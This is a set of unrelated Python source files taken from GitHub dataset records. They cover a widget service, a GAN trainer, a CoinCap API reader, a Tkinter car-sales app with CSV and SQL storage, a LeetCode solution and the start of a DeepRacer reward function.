widget_item_db.id,\n 'sort_index': widget_data_ids.index(widget_item_db.widget_data_id) + 1,\n 'updated_by': user_id\n } for widget_item_db in widget_items_db]\n\n updated_widgets_records = WidgetItem.update_widget_items_bulk(widget_items_update_mapping)\n return updated_widgets_records\n\n @staticmethod\n def get_widget_by_id(widget_id):\n \"\"\"Get widget by id.\"\"\"\n widget = WidgetModel.get_widget_by_id(widget_id)\n if not widget:\n raise KeyError('Widget ' + widget_id + ' does not exist')\n return widget\n\n def save_widget_items_bulk(self, widget_items: list, widget_id, user_id):\n \"\"\"Save widget items.\"\"\"\n widget: WidgetModel = self.get_widget_by_id(widget_id)\n\n one_of_roles = (\n MembershipType.TEAM_MEMBER.name,\n Role.EDIT_ENGAGEMENT.value\n )\n\n authorization.check_auth(one_of_roles=one_of_roles, engagement_id=widget.engagement_id)\n\n widget_items_db = WidgetItem.get_widget_items_by_widget_id(widget_id)\n\n self.delete_removed_widget_items(widget_items, widget_items_db)\n self.create_added_widget_items(widget_items, widget_items_db, user_id)\n self.update_widget_items_sorting(widget_items, widget_id, user_id)\n return widget_items\n\n @staticmethod\n def delete_widget(engagement_id, widget_id):\n \"\"\"Remove widget from engagement.\"\"\"\n one_of_roles = (\n MembershipType.TEAM_MEMBER.name,\n Role.EDIT_ENGAGEMENT.value\n )\n\n authorization.check_auth(one_of_roles=one_of_roles, engagement_id=engagement_id)\n\n widgets = WidgetModel.remove_widget(engagement_id, widget_id)\n if not widgets:\n raise ValueError('Widget to remove was not found')\n return widgets\n","repo_name":"bcgov/met-public","sub_path":"met-api/src/met_api/services/widget_service.py","file_name":"widget_service.py","file_ext":"py","file_size_in_byte":8209,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"34"} +{"seq_id":"74638458018","text":"#coding:utf-8\n\nimport re\n\nurl_str = 'http://www.baidu.com'\n\ndef check_url(url):\n result = re.findall('[a-zA-Z]{4,5}://\\w+.\\w+.\\w+',url)\n for i in result:\n return True\n return False\n\nif __name__ == '__main__':\n print(check_url(url_str))","repo_name":"coderiding/FullStackNotes","sub_path":"Python/慕课Python全栈笔记/32周/练习代码/level1/7w_code/033urlre.py","file_name":"033urlre.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"34"} +{"seq_id":"10943068613","text":"#!/usr/bin/env python \n# -*- coding: utf-8 -*-\n# @Time : 2022/4/9 13:33\n# @Author : Ly\n# @File : train.py\n# @Software: PyCharm\n# @Github : https://github.com/ly8073\nimport os\n\nimport numpy as np\nimport torch\nfrom matplotlib import pyplot as plt\nfrom torch.utils.data import DataLoader\nfrom torch.nn.functional import one_hot\n\nfrom GAN.models.model_zoo import GanForMinist, Discriminator\nimport MINIST.configs as cfg\n\n\nclass Trainer:\n def __init__(self, epoch=None):\n self.device = \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\n if epoch is not None:\n try:\n check_points = os.path.join(cfg.CHECKPOINT_FOLDER, f\"checkpoints_{epoch}.pkl\")\n dis_criminator_checkpoints = os.path.join(cfg.CHECKPOINT_FOLDER, f\"discriminator_{epoch}.pkl\")\n self.nets = torch.load(check_points).to(self.device)\n self.discriminator = torch.load(dis_criminator_checkpoints).to(self.device)\n except Exception:\n self.nets = GanForMinist(1, 16, 32).to(self.device)\n self.discriminator = Discriminator(784, 1).to(self.device)\n else:\n self.nets = GanForMinist(1, 16, 32).to(self.device)\n self.discriminator = Discriminator(784, 1).to(self.device)\n self.correct_rate = 0.80\n self.discriminator_optimizer = torch.optim.Adam(self.discriminator.parameters(),\n lr=cfg.DISCRIMINATOR_LEARNING_RATE)\n self.optimizer_decode = torch.optim.Adam(self.nets.decode.parameters(), lr=cfg.LEARNING_RATE)\n self.optimizer_encode = torch.optim.Adam(self.nets.encode.parameters(), lr=cfg.LEARNING_RATE)\n\n def train(self, train_set, test_set):\n train_loader = DataLoader(train_set, batch_size=cfg.BATCH_SIZE)\n test_loader = DataLoader(test_set, batch_size=cfg.BATCH_SIZE)\n train_losses, test_losses, correct_rates = [], [], []\n for i in range(cfg.EPOCH):\n discriminator_loss = self.train_discriminator(train_loader)\n loss = self.train_one_epoch(train_loader, i)\n train_losses.append(loss)\n eval_loss, correct_rate = self.eval_one_epoch(test_loader)\n correct_rates.append(correct_rate)\n test_losses.append(eval_loss)\n if i % cfg.CHECKPOINT == (cfg.CHECKPOINT - 1):\n if not os.path.exists(cfg.CHECKPOINT_FOLDER):\n os.mkdir(cfg.CHECKPOINT_FOLDER)\n torch.save(self.nets, os.path.join(cfg.CHECKPOINT_FOLDER, f\"checkpoints_{i}.pkl\"))\n torch.save(self.discriminator, os.path.join(cfg.CHECKPOINT_FOLDER, f\"discriminator_{i}.pkl\"))\n print(f\"epoch [{i + 1} / {cfg.EPOCH}] trained done. \"\n f\"\\n\\tdiscirminator_loss = {discriminator_loss}\"\n f\"\\n\\tloss={loss}, \"\n f\"\\n\\teval_loss = {eval_loss},\"\n f\"\\n\\tcorrect_rate = {correct_rate}%\")\n plt.subplot(1, 2, 1)\n plt.plot(train_losses)\n plt.plot(test_losses)\n plt.legend([\"train_losses\", \"test_losses\"])\n plt.subplot(1, 2, 2)\n plt.plot(correct_rates)\n plt.show()\n\n def train_one_epoch(self, data_loader, epoch_num):\n losses = []\n for index, (data, label) in enumerate(data_loader):\n data = data.to(self.device)\n label = label.to(self.device)\n numbers, fake_imgs = self.nets(data, label)\n fake_dis = self.discriminator(fake_imgs)\n loss_number, loss_image = compute_loss(numbers, label, data, fake_imgs)\n loss = loss_image - torch.sum(fake_dis)\n if self.correct_rate <= 0.98:\n self.optimizer_encode.zero_grad()\n loss_number.backward()\n self.optimizer_encode.step()\n self.optimizer_decode.zero_grad()\n loss.backward()\n self.optimizer_decode.step()\n losses.append(loss.item())\n if index % cfg.LOG_PERIOD == 0:\n print(\n f\"epoch [{epoch_num + 1}/{cfg.EPOCH}] of batch: {index}/{len(data_loader)}======loss: {loss.item()},\"\n f\" loss_number: {loss_number.item()}\")\n return np.mean(losses)\n\n def train_discriminator(self, data_loader):\n losses = []\n for index, (data, label) in enumerate(data_loader):\n data = data.to(self.device)\n real_dis = self.discriminator(data)\n random_input = generate_random_number(data.shape[0]).to(self.device)\n fake_image = self.nets.decode(random_input)\n fake_dis = self.discriminator(fake_image)\n loss = torch.sum(fake_dis - real_dis)\n losses.append(loss.item())\n self.discriminator_optimizer.zero_grad()\n loss.backward()\n self.discriminator_optimizer.step()\n return np.mean(losses)\n\n def eval_one_epoch(self, data_loader):\n losses = []\n correct_num, total = 0, 0\n with torch.no_grad():\n for index, (data, label) in enumerate(data_loader):\n data = data.to(self.device)\n label = label.to(self.device)\n numbers, fake_image = self.nets(data)\n fake_dis = self.discriminator(fake_image)\n loss_number, loss_image = compute_loss(numbers, label, data, fake_image)\n loss = loss_image - torch.sum(fake_dis)\n losses.append(loss.item())\n prop, judge = torch.max(numbers, dim=1)\n _, numers = torch.max(label, dim=1)\n correct_num += ((judge == numers).sum().item())\n total += label.size(0)\n self.correct_rate = correct_num / total\n return np.mean(losses), 100 * self.correct_rate\n\n\ndef compute_loss(numbers, label, data, fake_images):\n criterion_number = torch.nn.CrossEntropyLoss()\n criterion_image = torch.nn.KLDivLoss()\n loss_number = criterion_number(numbers, label)\n loss_image = criterion_image(fake_images, data) + criterion_image(data, fake_images)\n return loss_number, loss_image\n\n\ndef generate_random_number(batch_num):\n random_number = torch.randint(0, 10, (batch_num, ))\n return one_hot(random_number, num_classes=10).float()\n","repo_name":"ly8073/CV","sub_path":"GAN/models/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10705372143","text":"import requests\nimport json\nimport logging\nimport time\n\nlogger = logging.getLogger(__name__)\n\n\nclass CoinIoReader:\n\n def __init__(self):\n self.url = \"http://coincap.io/\"\n\n\n # Get : http://coincap.io/front/\n def getCoinCapFrontData(self):\n start = time.time()\n content= self.getCoinCapData('front')\n json_data = json.loads(content.text)\n logger.info(\"Time GET: \" + str(time.time() - start))\n return json_data\n\n #Get Befehl\n def getCoinCapData(self,argument):\n response = requests.get(self.url+argument)\n if (response.ok):\n return response\n else:\n response.raise_for_status()\n\n\n #Methode wird noch nicht verwendet\n def getMostImportantCoins(self, minMktCap):\n allCoins= self.getCoinCapFrontData()\n importantCoinList=[]\n for coins in allCoins:\n if coins[\"mktcap\"] >=minMktCap:\n importantCoinList.append(coins[\"short\"])\n return importantCoinList\n\n #Test Methode laeuft noch nicht\n #Content kann nicht in Dict gewandelt werden aber ich schnall nicht wieso\n def getDataOfImportantCoins(self):\n coinDict={}\n importantCoins=self.getMostImportantCoins(50000000000)\n response= self.getCoinCapData('history/365day/BTC')\n for coin in importantCoins:\n response = self.getCoinCapData('history/365day/'+coin)\n dict = response.json()\n coinDict[coin]=dict\n return coinDict\n\n # Methode wird noch nicht verwendet\n def getCoins(self):\n response = requests.get(self.url + 'coins')\n if (response.ok):\n print(\"\\n\")\n test = response.content\n json_data = json.loads(response.text)\n return json_data\n else:\n response.raise_for_status()\n\n\n\nif __name__ == \"__main__\":\n coinreader= CoinIoReader()\n coinreader.getDataOfImportantCoins()","repo_name":"DatTobbes/Mine-Crypto-Data-an-Tweets","sub_path":"service/collect_from_coincap.py","file_name":"collect_from_coincap.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"12811297952","text":"from __future__ import annotations\nfrom src.Validations.Validation import Validation\n\n\nclass CourseOpenEnrollmentValidation(Validation):\n \"\"\"\n required kwargs\n student: Student, course_section: CourseSection\n \"\"\"\n __instance = None\n\n @staticmethod\n def getInstance():\n \"\"\" Static access method. \"\"\"\n if CourseOpenEnrollmentValidation.__instance == None:\n CourseOpenEnrollmentValidation()\n return CourseOpenEnrollmentValidation.__instance\n\n def __init__(self):\n \"\"\" Virtually private constructor. \"\"\"\n self._conn = None\n if CourseOpenEnrollmentValidation.__instance != None:\n raise Exception(\"This class is a singleton!\")\n else:\n CourseOpenEnrollmentValidation.__instance = self\n\n def is_valid(self, report, **kwargs):\n print(\"course open enrollment validator doing its thang\")\n course_section = kwargs['course_section']\n\n validation = self.__class__.__name__\n success = course_section.enrollment_open\n\n if course_section.enrollment_open:\n msg = \"Course is open for enrollment\"\n else:\n msg = \"Course is not open for enrollment\"\n\n report.add_data(validation=validation, success=success, msg=msg)\n","repo_name":"noahpselman/oop","sub_path":"src/Validations/CourseOpenEnrollmentValidation.py","file_name":"CourseOpenEnrollmentValidation.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15449655331","text":"\"\"\"\n566. Reshape the Matrix\n\"\"\"\nimport itertools\nfrom typing import List\n\nimport pytest\ndef matrixReshape(mat: List[List[int]], r: int, c: int) -> List[List[int]]:\n m, n = len(mat), len(mat[0])\n if m*n != r*c: return mat\n \"\"\"\n Notice: the matrix initialization!!!\n \"\"\"\n res = [[0 for i in range(c)] for j in range(r)]\n #res = [[0]*c]*r not good, very bad\n # res = [].append(range(r,c))WRONG\n mat_list = [j for i in range(m) for j in mat[i]]\n # print(res, mat_list)\n k = 0\n for i in range(r):\n for j in range(c):\n res[i][j] = mat_list[k]\n print(i, j, res, mat_list[k], k)\n k += 1\n return res\n\n\n# very good answers\ndef matrixReshape1(mat: List[List[int]], r: int, c: int) -> List[List[int]]:\n flat = sum(mat, [])\n if len(flat) != r * c:\n return mat\n tuples = zip(*([iter(flat)] * c))\n return map(list, tuples)\n #return mat if len(sum(mat, [])) != r * c else map(list, zip(*([iter(sum(mat, []))]*c)))\n\ndef matrixReshape2(mat: List[List[int]], r: int, c: int) -> List[List[int]]:\n if r * c != len(mat) * len(mat[0]):\n return mat\n it = itertools.chain(*mat)\n return [list(itertools.islice(it, c)) for _ in range(r)]\n\ntest_case = [\n ([[1,2],[3,4]], 1, 4, [[1,2,3,4]]),\n ([[1,2],[3,4]], 4, 1, [[1],[2],[3],[4]]),\n ([[1,2],[3,4]], 2, 1, [[1,2],[3,4]]),\n ([[1,2,3], [4,5,6]], 3, 2, [[1, 2], [3, 4], [5, 6]]),\n ([[1,2,3], [4,5,6]], 6, 1, [[1],[2],[3],[4],[5],[6]]),\n]\n\n@pytest.mark.parametrize(\"mat, r, c, expect\", test_case)\ndef test_matrixReshape(mat: List[List[int]], r: int, c: int, expect: List[List[int]])->None:\n assert matrixReshape(mat, r, c) == expect","repo_name":"Cheedge/LeetCode_Honing","sub_path":"Leetcode/566.py","file_name":"566.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34379249845","text":"import discord\nfrom discord.ext import commands\n\nclass Commands():\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(aliases=[\"t\"], description='Temporary command KEK')\n async def test(self, ctx):\n await ctx.send(\"Test\")\n\n @commands.command(aliases=[\"attack\"], description='Have magikarp attack a user!')\n async def splash(self, ctx, *, target: discord.User):\n embed = discord.Embed(title='Magikarp used splash against '+target.name, colour=ctx.author.colour)\n embed.set_author(icon_url=self.bot.user.avatar_url, name=str(self.bot.user.name))\n await ctx.send(content=None, embed=embed)\n\n\ndef setup(bot):\n bot.add_cog(Commands(bot))","repo_name":"CheesecakeCG/MagikarpBot","sub_path":"Extensions/commands/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15542479160","text":"### Import required modules ###\n\n#These are the 2 modules from the directory\nimport constant, helper\n\nimport csv\nfrom tabulate import tabulate\nfrom tkinter import *\nfrom tkinter import ttk\nfrom functools import partial\nimport sys\n\n#If the constant file is set to use a DB for storage then this will trigger\n#It connects to the DB, and then executes 2 postgreSQL commands\n#These commands ensure that the tables are created in the database\n#The URI of said database is accessable from the constants file\nif not sys.argv[1].lower()==\"csv\":\n #Importing the required SQL alchemy modules to set up the DB only needed when running in DB mode\n from sqlalchemy import create_engine\n from sqlalchemy.orm import scoped_session, sessionmaker\n\n #Connecting to the corrects server\n engine = create_engine(constant.dbURI)\n db = scoped_session(sessionmaker(bind=engine))\n\n # Creates table \"car\" this stores data about the car\n db.execute(\"\"\"CREATE TABLE IF NOT EXISTS \"car\" (\n\"id\" serial NOT NULL,\n\"model\" character varying NOT NULL,\n\"cost\" integer NOT NULL,\n\"year\" integer NOT NULL,\n\"emissions\" integer NOT NULL,\n\"extras\" character varying NOT NULL,\n\"discount\" integer NOT NULL,\n\"addition\" integer NOT NULL,\n\"final\" integer NOT NULL,\n\"salesperson\" character varying NOT NULL\n);\"\"\")\n # Creates table \"salesperson\" this stores data about the salespeople\n db.execute(\"\"\"CREATE TABLE IF NOT EXISTS \"salesperson\" (\n\"id\" serial NOT NULL,\n\"name\" character varying NOT NULL,\n\"total\" integer NOT NULL,\n\"salesValue\" integer NOT NULL,\n\"numberOfSales\" integer NOT NULL\n);\"\"\")\n\n #Commits changes to the database\n db.commit()\n\n\"\"\"\n _ _ ___ _ _ ____ _ _ ___\n | \\ | | / _ \\ | \\ | | / ___| | | | | |_ _|\n | \\| | | | | | | \\| | _____ | | _ | | | | | |\n | |\\ | | |_| | | |\\ | |_____| | |_| | | |_| | | |\n |_| \\_| \\___/ |_| \\_| \\____| \\___/ |___|\n\n\"\"\"\n#This is the function that runs when the user selects to run in the txt viewCar\ndef nonGUI():\n #Looped to allow multiple cars to be added easily\n while True:\n #Essentially the menu\n choice = input(\"Would you like to view the data or add a car or view your sales or quit [view/add/sales/quit] - \").lower()\n #If user elects to add a new car\n if choice == 'add':\n #Loops until an acceptable set of inputs has been provided\n #This is controlled by the validator function in helper.py\n while True:\n carDetails = helper.acceptDetails()\n validator = helper.validateInput(carDetails)\n if validator:\n #Prints error and allows user to see issue\n print(\"-- ERROR WITH INPUT --\")\n print(validator)\n else:\n #Once an acceptable set is inputed\n break\n #Calculates the discount\n discount = helper.calculateDiscount(carDetails)\n #Calculates the addition\n addition = helper.calculateAddition(carDetails)\n #Calculates the final\n final = helper.calculateFinal(carDetails.cost, discount, addition)\n #Generates a pricelist with the class `priceList`\n priceList = constant.priceList(discount, addition, final)\n #Calculates the comission\n comissionAmount = round(helper.comission(priceList, carDetails), 2)\n #Outputs the inputs and calculated valuse\n #Must be cast to string to take advantage of the classes __str__\n print(str(carDetails))\n print(str(priceList))\n print(f\"(Comission => {comissionAmount})\")\n #Checks the user wants to save this car, or just calculate the values\n if input(\"Would you like to save this car [y/n] - \").lower() == 'y':\n #Requests a name to store the car under\n salesPerson = input(\"Enter your name - \")\n #Checks if storage is in csv or DB\n if sys.argv[1].lower()==\"csv\":\n #Writes data to the CSV\n #Fisrt the data for the car\n csvWriter = csv.writer(open('carSales.csv', 'a'))\n csvWriter.writerow([carDetails.model,carDetails.cost,carDetails.year,carDetails.emissions,carDetails.extra,priceList.discount, priceList.addition, priceList.final, salesPerson])\n #Then the data for the salesperson\n readerData = list(csv.reader(open('salesData.csv')))\n #first check that they dont already exist\n found = False\n for i in range(len(readerData)):\n if readerData[i][0] == salesPerson:\n #If they do already exst then add the data to the old data\n found = True\n readerData[i][1] = int(readerData[i][1]) + comissionAmount\n readerData[i][2] = int(readerData[i][2]) + priceList.final\n readerData[i][3] = int(readerData[i][3]) + 1\n writer = csv.writer(open('salesData.csv', 'w'))\n writer.writerows(readerData)\n if not found:\n #Otherwise add them to the file\n writer = csv.writer(open('salesData.csv', 'a'))\n writer.writerow([salesPerson, comissionAmount,priceList.final,1])\n else:\n #Add car to the database\n db.execute(\"INSERT INTO car (model, cost, year,emissions,extras, discount, addition, final, salesperson) VALUES (:model, :cost, :year, :emissions, :extras, :discount, :addition, :final, :salesperson)\",\n {\"model\": carDetails.model, \"cost\": carDetails.cost, \"year\": carDetails.year, \"emissions\": carDetails.emissions, \"extras\": carDetails.extra, \"discount\": priceList.discount, \"addition\": priceList.addition, \"final\": priceList.final, \"salesperson\": salesPerson})\n db.commit()\n #Commit this change (commited now as contingency incase of accidental disconnect, etc)\n line = db.execute(\"SELECT * FROM salesperson WHERE name = :salesperson\", {\"salesperson\":salesPerson}).fetchone()\n #Check for data\n if line != None:\n line = list(line)\n db.execute(\"UPDATE salesperson SET total= :comission, salesValue = :final, numberOfSales = :salesCount WHERE name = :salesperson;\", {\"comission\" :line[2]+comissionAmount , \"final\":line[3]+ priceList.final , \"salesCount\": line[4]+1, \"salesperson\" : salesPerson})\n else:\n db.execute(\"INSERT INTO salesperson (name,total,salesValue,numberOfSales) VALUES (:name, :total, :salesValue, :numberOfSales)\", {\"name\" : salesPerson, \"total\":comissionAmount, \"salesValue\": priceList.final, \"numberOfSales\":1})\n db.commit()\n #If the user elected to view the data instead\n elif choice == 'view':\n #get the data from whereever it currently exists\n if sys.argv[1].lower()==\"csv\":\n #print the heading\n print('\\nCAR DATA\\n')\n #Pull the data, and use tabulate to generate an ASCII table for displaying\n data = list(csv.reader(open('carSales.csv')))\n print(tabulate(data,headers=\"firstrow\",tablefmt=\"grid\"))\n #print the heading\n print('\\nSALES DATA\\n')\n #Pull the data, and use tabulate to generate an ASCII table for displaying\n data = list(csv.reader(open('salesData.csv')))\n print(tabulate(data,headers=\"firstrow\",tablefmt=\"grid\"))\n else:\n #Pull the data from the DB\n carData = list(db.execute(\"SELECT * FROM car\").fetchall())\n #print the heading\n print('\\n CAR DATA \\n')\n #Use tabulate to generate an ASCII table for displaying\n print(tabulate(carData,headers=[\"id\",\"Model\",\"Initial Price\",\"Year\",\"Emissions\",\"Extras\",\"Discount\",\"Addition\",\"Final Price\",\"Salesperson\"],tablefmt=\"grid\"))\n #print the heading\n print('\\nSALES DATA\\n')\n #Pull the data, and use tabulate to generate an ASCII table for displaying\n data = list(db.execute(\"SELECT * FROM salesperson\").fetchall())\n print(tabulate(data,headers=[\"id\",\"name\",\"Comission\",\"Sales Total\",\"Sales\"],tablefmt=\"grid\"))\n #If the user elected to see the sales data\n elif choice == 'sales':\n if sys.argv[1].lower()==\"csv\":\n #Pull the data from the CSV\n data = list(csv.reader(open('salesData.csv')))\n #print the heading\n print('\\n SALES DATA \\n')\n #Use tabulate to generate an ASCII table for displaying\n print(tabulate(data,headers=\"firstrow\",tablefmt=\"grid\"))\n else:\n #Pull the data from the DB\n data = list(db.execute(\"SELECT * FROM car WHERE salesperson = :name\", {\"name\":input('Enter the name of the salesperson - ')}).fetchall())\n #print the heading\n print('\\n SALES DATA \\n')\n #Use tabulate to generate an ASCII table for displaying\n print(tabulate(data,headers=[\"id\",\"Model\",\"Initial Price\",\"Year\",\"Emissions\",\"Extras\",\"Discount\",\"Addition\",\"Final Price\",\"Salesperson\"],tablefmt=\"grid\"))\n #Allows the user to quit the program, will do so too if the text was not one of the 3 options\n else:\n exit()\n\n\"\"\"\n ____ _ _ ___\n / ___| | | | | |_ _|\n | | _ | | | | | |\n | |_| | | |_| | | |\n \\____| \\___/ |___|\n\n\"\"\"\n\ndef homePage():\n #Main home page of the app, shows 3 buttons, allowing rediect to other pages\n root = Tk()\n canvas = Canvas(root, width = 400, height = 300)\n canvas.pack()\n #Sets up title, sub title and buttons\n title = Label(root, text='Car Inventory')\n title.config(font=('helvetica', 30))\n canvas.create_window(200, 25, window=title)\n\n subTitle = Label(root, text='Select an option:')\n subTitle.config(font=('helvetica', 10))\n canvas.create_window(200, 100, window=subTitle)\n\n viewCar = Button (text = \"View Cars\", command = viewCarPage ,width = 12)\n viewCar.place(x = 150,y = 110)\n\n viewSales = Button (text = \"View Sales\", command = viewSalePage,width = 12)\n viewSales.place(x = 150,y = 135)\n\n #partial has to be used here to create the function so it can be called without parameters\n #This is because the command in Button doesnt support parsing parameters\n add_Page=partial(addPage, \"\")\n addCar = Button (text = \"Add Car\", command=add_Page, width = 12)\n addCar.place(x = 150,y = 160)\n\n root.mainloop()\n\n#This page will show a table of the cars\ndef viewCarPage():\n #Grab the data for the car\n carData = list(csv.reader(open('carSales.csv')))[1:] if sys.argv[1].lower()==\"csv\" else list(db.execute(\"SELECT * FROM car\").fetchall())\n #Set up tkinter\n root = Tk()\n\n #Define the table headers\n if not sys.argv[1].lower()==\"csv\":\n head = [\"ID\",\"Model\",\"Initial Price\",\"Year\",\"Emissions\",\"Extras\",\"Discount\",\"Addition\",\"Final Price\",\"Salesperson\"]\n else:\n head = [\"Model\",\"Initial Price\",\"Year\",\"Emissions\",\"Extras\",\"Discount\",\"Addition\",\"Final Price\",\"Salesperson\"]\n #treeview allows the generation of a table in tk\n treeview = ttk.Treeview(root)\n treeview.grid(columnspan=10)\n treeview[\"columns\"] = head\n treeview[\"show\"] = \"headings\"\n for val in head:\n treeview.heading(val, text=val)\n treeview.column(val, minwidth=0, width=120)\n index, iid = 0, 0\n for val in carData:\n treeview.insert(\"\", index, iid, values=tuple(val))\n index +=1\n iid+=1\n root.mainloop()\n\n#Similar to viewCarPage this funtion shows a window with the data for the salespeople instead\ndef viewSalePage():\n #Grab the data for the car\n salesData = list(csv.reader(open('salesData.csv')))[1:] if sys.argv[1].lower()==\"csv\" else list(db.execute(\"SELECT * FROM salesperson\").fetchall())\n #Set up tkinter\n root = Tk()\n\n #Define the table headers\n if not sys.argv[1].lower()==\"csv\":\n head = [\"ID\",\"Name\",\"Total Comission\",\"Value Sold\",\"Cars Sold\"]\n else:\n head = [\"Name\",\"Total Comission\",\"Value Sold\",\"Cars Sold\"]\n #treeview used to generate a table in tk\n treeview = ttk.Treeview(root)\n treeview.grid(columnspan=9)\n treeview[\"columns\"] = head\n treeview[\"show\"] = \"headings\"\n for val in head:\n treeview.heading(val, text=val)\n treeview.column(val, minwidth=0, width=120)\n index, iid = 0, 0\n for val in salesData:\n treeview.insert(\"\", index, iid, values=tuple(val))\n index +=1\n iid+=1\n root.mainloop()\n\n#Function that adds data based on the inputs\n#must take the buttons as params\ndef addData(modelIn1,modelIn2,modelIn3,modelIn4,modelIn5,modelIn6):\n #Get inputs once submit is pressed\n x1,x2,x3,x4,x5 = (modelIn1.get()),(modelIn5.get()),(modelIn2.get()),(modelIn3.get()),(modelIn4.get())\n #Create a car object\n carData = constant.car(x1 , x2,x3,x4,x5)\n #Get inputed sales person\n salesPerson = modelIn6.get()\n\n #Validate inputs\n validator = helper.validateInput(carData)\n if validator:\n #Display bassic error page, no context passed in here\n root = Tk()\n canvas = Canvas(root, width = 400, height = 300)\n canvas.pack()\n\n title = Label(root, text='Error with Inputs')\n title.config(font=('helvetica', 30))\n canvas.create_window(200, 25, window=title)\n\n root.mainloop()\n\n else:\n #Store data\n discount = helper.calculateDiscount(carData)\n addition = helper.calculateAddition(carData)\n final = helper.calculateFinal(carData.cost, discount, addition)\n priceList = constant.priceList(discount, addition, final)\n comissionAmount = round(helper.comission(priceList, carData), 2)\n if sys.argv[1].lower()==\"csv\":\n csvWriter = csv.writer(open('carSales.csv', 'a'))\n csvWriter.writerow([carData.model,carData.cost,carData.year,carData.emissions,carData.extra,priceList.discount, priceList.addition, priceList.final, salesPerson])\n readerData = list(csv.reader(open('salesData.csv')))\n found = False\n for i in range(len(readerData)):\n if readerData[i][0] == salesPerson:\n found = True\n readerData[i][1] = int(float(readerData[i][1])) + comissionAmount\n readerData[i][2] = int(float(readerData[i][2])) + priceList.final\n readerData[i][3] = int(readerData[i][3]) + 1\n writer = csv.writer(open('salesData.csv', 'w'))\n writer.writerows(readerData)\n if not found:\n writer = csv.writer(open('salesData.csv', 'a'))\n writer.writerow([salesPerson, comissionAmount,priceList.final,1])\n #Display the addPage again, with the message data added\n addPage(\"Data Added\")\n else:\n global db\n db.execute(\"INSERT INTO car (model, cost, year,emissions,extras, discount, addition, final, salesperson) VALUES (:model, :cost, :year, :emissions, :extras, :discount, :addition, :final, :salesperson)\",\n {\"model\": carData.model, \"cost\": carData.cost, \"year\": carData.year, \"emissions\": carData.emissions, \"extras\": carData.extra, \"discount\": priceList.discount, \"addition\": priceList.addition, \"final\": priceList.final, \"salesperson\": salesPerson})\n db.commit()\n line = db.execute(\"SELECT * FROM salesperson WHERE name = :salesperson\", {\"salesperson\":salesPerson}).fetchone()\n if line != None:\n line = list(line)\n db.execute(\"UPDATE salesperson SET total= :comission, salesValue = :final, numberOfSales = :salesCount WHERE name = :salesperson;\", {\"comission\" :line[2]+comissionAmount , \"final\":line[3]+ priceList.final , \"salesCount\": line[4]+1, \"salesperson\" : salesPerson})\n else:\n db.execute(\"INSERT INTO salesperson (name,total,salesValue,numberOfSales) VALUES (:name, :total, :salesValue, :numberOfSales)\", {\"name\" : salesPerson, \"total\":comissionAmount, \"salesValue\": priceList.final, \"numberOfSales\":1})\n db.commit()\n #Display the addPage again, with the message data added\n addPage(\"Data Added\")\n\n\n#The form for data input\ndef addPage(message):\n #shows a page for adding the data\n pageAdd = Tk()\n canvas = Canvas(pageAdd, width = 300, height = 300)\n title = Label(pageAdd, text='Add Car')\n title.config(font=('helvetica', 30))\n canvas.create_window(150, 25, window=title)\n #Will display a message if not \"\" or None\n if message:\n subtitle = Label(pageAdd, text=message)\n subtitle.config(font=('helvetica', 10), fg = \"black\")\n canvas.create_window(150, 50, window=subtitle)\n\n #Label values for input form\n inText = (\"Model:\", \"Year:\", \"Emissions:\", \"Extras:\", \"Cost:\", \"Salesperson:\")\n for i in range(len(inText)):\n labels = Label(pageAdd, text=inText[i])\n canvas.create_window(50, 90+(i*30), window=labels)\n\n #Input forms\n modelIn1 = Entry(pageAdd)\n canvas.create_window(200, 90, window=modelIn1)\n modelIn2 = Entry(pageAdd)\n canvas.create_window(200, 120, window=modelIn2)\n modelIn3 = Entry(pageAdd)\n canvas.create_window(200, 150, window=modelIn3)\n modelIn4 = Entry(pageAdd)\n canvas.create_window(200, 180, window=modelIn4)\n modelIn5 = Entry(pageAdd)\n canvas.create_window(200, 210, window=modelIn5)\n modelIn6 = Entry(pageAdd)\n canvas.create_window(200, 240, window=modelIn6)\n\n canvas.pack()\n\n #Submit button\n add_Data = partial(addData,modelIn1,modelIn2,modelIn3,modelIn4,modelIn5,modelIn6)\n submit = Button(canvas, text='Submit', command=add_Data)\n submit.place(x=150, y=260)\n\n canvas.pack()\n pageAdd.mainloop()\n\n\"\"\"\n ____ ____ ___ __ __ _____ ____ ____ ___ ____ _____\n | _ \\ | _ \\ |_ _| \\ \\ / / | ____| | _ \\ / ___| / _ \\ | _ \\ | ____|\n | | | | | |_) | | | \\ \\ / / | _| | |_) | | | | | | | | | | | | _|\n | |_| | | _ < | | \\ V / | |___ | _ < | |___ | |_| | | |_| | | |___\n |____/ |_| \\_\\ |___| \\_/ |_____| |_| \\_\\ \\____| \\___/ |____/ |_____|\n\n\"\"\"\nif sys.argv[2].lower()=='gui':\n homePage()\nelse:\n while True:\n nonGUI()\n","repo_name":"john-montgomery2003/bridging","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36231605371","text":"def reward_function(params):\n '''\n Example of rewarding the agent to follow center line\n '''\n\n # Read input parameters\n track_width = params['track_width']\n distance_from_center = params['distance_from_center'] - 0.2;\n steering = abs(params['steering_angle'])\n off_track = params['is_offtrack']\n is_reversed = params['is_reversed']\n left = params['is_left_of_center']\n speed = params['speed']\n\n marker_1 = 0.1 * track_width\n marker_2 = 0.25 * track_width\n # marker_3 = 0.5 * track_width\n\n # Give higher reward if the car is closer to center line and vice versa\n if not left:\n reward = 0.2\n else:\n if distance_from_center > 